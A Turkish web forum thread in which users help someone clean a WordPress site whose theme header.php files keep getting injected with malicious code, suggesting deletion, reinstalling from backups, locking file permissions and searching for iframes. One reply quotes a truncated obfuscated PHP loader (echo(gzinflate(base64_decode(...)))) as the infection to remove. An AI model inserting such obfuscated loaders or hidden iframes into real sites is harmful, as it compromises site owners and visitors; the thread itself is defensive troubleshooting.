-
-
Yaş/Cinsiyet
35 / E
-
Meslek
Makine Müh.
-
-
Ad Soyad
A** M**
-
-
-
Ticaret
6, (%100)
Aynen işte asıl sorun (virüs) orası.
#c3284d#
echo(gzinflate(base64_decode("dVr9c9vG0f5X5B8yoExI xn0DEU8d17E3O3tx7PP7mq2X/TNbrj8PO9
#/c3284d#
Bu kısmı tamamen silip tekrar at ftp.ye. Muhtemelen themes klasörünün içindeki diğer tema dosyalarının header.php.lerinde de vardır benzer kodlar. Onları da temizlersen sıkıntı kalmaz :)
#Blog'canım: maziliguney.com
Reklam, tanıtım yazısı, link vs için iletişime geçebilirsiniz.
-
-
Yaş/Cinsiyet
- /
-
Meslek
-
Ad Soyad
** **
-
-
-
Ticaret
2, (%100)
tek çözümü var arkadaşım oda eğer yedek aldıysan onu kurcan kurmadan öncede tüm herşeyi temizleyeceksin herşey iderken ftpdeki herşeyi yani wordpress i tekrar kuracaksın ve son yedeği koyacaksın yoksa mümkünatı yok düzelmez ve onu yapanda virüs değil eklenti önüne gelen eklentiyi kurma banada olmuştu yedeğin yoksa kurtarma şansın yok yedek derken dosyaların yedeği eğer temada oynama yapmadıysan yani ilk hali gibiyse temayı tekrar 0dan kurabilirsin önce db nin yedeğini al gz formatında sıfıdan kurduktan sonra onu içer aktarırısn wordpress in içinden alma yedeği db yi oluşturduğun bölümden phpmyadmin den alcaksın yedeği hadi kolay gelsin
1 kişi bu mesajı beğendi.
-
-
Yaş/Cinsiyet
43 / E
-
Meslek
Bilişim / İnternet
-
-
Ad Soyad
M** D**
-
-
-
Ticaret
13, (%100)
Şu şekilde önüne geçebildim,
Virüs bir yerden temaya bulaşıyor bende temanın dosya izinlerini kısıtladım yazma iznini kapattım ve cpanelden yeni temayı yükledim zipli olarak sonra zip i açıp temayı aktif ettim. Şimdilik sorun yok fakat bu kodun nerede barındığını tespit edemedim. Yedeğim olmadığı için yükleyemiyorum zaten gerekte kalmadı.
Gerçekten ilginç bir durum aslında her eklentiyi kurmam hatta eklenti bile kurmadım uzun zamandır ama yinede bulaştı.
Google bile kara listeye aldı sitemi ama 1 gün sonra bildirimde bulundum şimdi temiz.
Securi.net ten de tarama yaptım taramayı başarıyla geçti.
Sonuç: Virüs bilgisayarımda barınıyormuş ve ftp programıyla hosta dosya gönderirken temaya kendini yazıyormuş.
Bir çok antivirüs denedim hiç biri bulmadı en son eset nod 32 ile tarattım birkaç trojan ve Malware tabanlı virüsler buldu tümünü temizledim.
Tek sorun tema internet explorer da düzgün görünmüyor yenisini yüklememe ve hiç virüs, zararlı kod olmamasına rağmen bunuda çözersem iştamamdır.
Kimsenin başına gelmez umarım epey sıkıntılı bir durum oldu Allahtan zararsız atlattık.
-
-
Yaş/Cinsiyet
35 / E
-
Meslek
Özel Sektör
-
Ad Soyad
H** Ç**
-
-
-
Ticaret
0, (%0)
Kardeş aynı problem bendede mevcut bende dediğin gibi bir yapıyım bakalım düzelicekmi
Teşekkürler
-
-
Yaş/Cinsiyet
35 / E
-
Meslek
Özel Sektör
-
Ad Soyad
H** Ç**
-
-
-
Ticaret
0, (%0)
Kardeş teşekkürler.
O konuda sıkıntı yok, sıkıntı şu o kodlar silinsede ertesi gün tekrar oluşuyor.
-
-
Yaş/Cinsiyet
42 / E
-
Meslek
muhasebe
-
-
Ad Soyad
** **
-
-
-
Ticaret
3, (%100)
"Advanced Find and Replace" programı ile iframe diye tema klasörünü hatta ftp deki bütün klasörlerini taratın. mutlaka iframe girmiştir hocam. zamanında bende çok çektim.